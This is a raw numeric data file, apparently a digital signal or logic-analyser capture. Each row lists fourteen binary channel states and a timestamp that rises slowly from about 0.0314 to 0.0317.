0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401268e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401392e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401416e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401444e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401468e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401568e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401596e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401620e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1401644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1401668e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1526148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1526372e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,3.1526408e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1526432e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1526980e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1527484e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527504e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527512e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1527532e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527556e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527564e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1527604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527628e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527636e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1527652e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527680e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1527684e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527688e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1527732e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527756e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527760e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1527780e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527812e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1527828e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527852e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527860e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1527880e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1527904e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1527908e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527912e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1527956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1527980e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528028e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528052e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528108e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.1528132e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528136e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1528156e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528180e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1528228e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528260e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528280e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528304e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528308e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1528356e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528380e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528388e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528480e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528556e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528580e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528584e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1528628e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528660e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528680e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528704e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528708e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1528732e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528756e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1528760e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528764e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528880e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528904e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1528956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1528980e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.1528984e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1528988e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1529004e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529028e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1529080e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529112e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529132e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529156e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529160e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1529180e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529212e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529256e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529280e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529332e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529356e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529480e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529504e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529508e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1529532e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529556e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529564e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529580e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529604e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529628e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529652e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529660e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1529708e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529732e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,3.1529736e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529740e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529756e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529780e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529880e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529904e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1529956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1529980e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1529984e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1530028e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530052e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1530080e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530112e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530156e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530180e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530228e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530252e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530308e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530328e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530332e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1530352e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530376e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530384e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530476e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530552e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530576e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530628e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530636e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1530676e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530704e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530708e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530728e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530752e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530780e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530804e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530828e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530852e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,3.1530856e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530860e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,3.1530908e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,3.1530928e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530940e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1530952e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1530976e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531152e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531176e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531276e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531304e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531352e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531380e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531480e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531556e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531580e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531680e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531704e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531732e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531756e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531780e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531880e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531904e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1531956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1531980e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532080e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532156e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532180e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532280e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532304e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532332e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532356e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532380e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532480e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532556e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532580e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532680e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532704e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532732e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532756e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532780e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532880e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532904e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1532956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1532980e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533080e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533152e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533180e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533280e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533304e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533332e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533352e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533380e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533480e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533504e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533532e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533552e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533580e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533680e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533704e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533732e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533752e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533780e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533880e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533904e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533932e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1533952e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1533980e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534080e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534152e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534180e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534280e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534352e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534376e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,3.1534404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,3.1534428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,3.1658052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658228e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,3.1658260e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658292e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1658572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658600e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1658620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658648e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.1658652e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,3.1658668e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.1658692e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658700e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,3.1658720e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658744e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.1658748e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,3.1658772e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,3.1658796e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,1,3.1658800e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658804e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1658820e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1658844e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1658868e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1658892e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1658920e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1658944e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1658948e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1658972e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1658996e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659020e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659044e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659068e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659092e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659100e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659120e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659144e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659148e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659172e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659196e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,3.1659200e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659204e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659220e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659244e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1659248e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659252e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659268e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659292e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659300e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659320e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659344e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659372e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659396e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659420e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659444e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659468e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659492e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659500e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659520e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659544e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,3.1659548e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659552e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659572e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659596e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659620e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659644e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1659648e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659652e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659668e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659692e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659720e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659744e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659772e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659796e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,3.1659800e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659804e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659820e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659844e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1659848e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659852e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1659868e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1659892e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659900e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659916e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659944e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1659972e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1659992e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,0,3.1659996e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660000e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,3.1660020e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,3.1660044e-02 